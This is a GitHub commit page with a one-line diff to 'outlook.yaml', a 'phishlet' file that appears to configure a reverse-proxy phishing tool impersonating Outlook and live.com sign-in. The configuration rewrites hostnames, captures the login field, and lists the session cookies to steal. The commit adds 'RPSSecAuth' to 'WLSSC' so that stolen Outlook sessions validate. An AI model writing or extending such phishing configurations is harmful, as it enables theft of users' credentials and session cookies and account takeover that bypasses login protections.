Skip to content

Commit

Permalink
Update outlook.yaml
Browse files Browse the repository at this point in the history
Add keys: ['WLSSC','RPSSecAuth'] for validate session outlook.com
  • Loading branch information
frdaz authored and kgretzky committed Feb 2, 2021
1 parent 86ef8f0 commit 4abfbc5
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion phishlets/outlook.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -16,7 +16,7 @@ sub_filters:
- {triggers_on: 'account.live.com', orig_sub: 'account', domain: 'live.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
auth_tokens:
- domain: '.live.com'
keys: ['WLSSC']
keys: ['WLSSC','RPSSecAuth']
credentials:
username:
key: 'login'
Expand Down

0 comments on commit 4abfbc5

Please sign in to comment.